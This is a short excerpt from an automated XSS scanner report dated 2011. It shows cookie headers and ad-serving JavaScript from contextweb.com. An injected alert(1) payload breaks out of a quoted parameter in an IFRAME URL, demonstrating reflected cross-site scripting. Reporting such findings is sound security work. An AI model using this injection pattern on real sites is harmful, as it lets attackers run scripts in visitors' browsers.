Set-Cookie: cr=15|1|-8589001706269433644|1; domain=.contextweb.com; expires=Fri, 16-Mar-2012 22:04:18 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Wed, 23-Mar-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/221/tmz/300x250/8/meld.js"></scr'+'ipt>\n'
+ '\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.c
...[SNIP]...
<IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.NEWSCURRENTAFFAIRS,529848,1931,996,749,,RCQU1,RCQU9,EMON1,EHEX1,AMQU1,FE479,FE311,FE655,FACO1,TMHS1,DOT23,SHME2,ITUT5beab4'-alert(1)-'2f2493da65d,300X250" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO">
...[SNIP]...

Report generated by XSS.CX at Thu Mar 24 06:46:39 CDT 2011.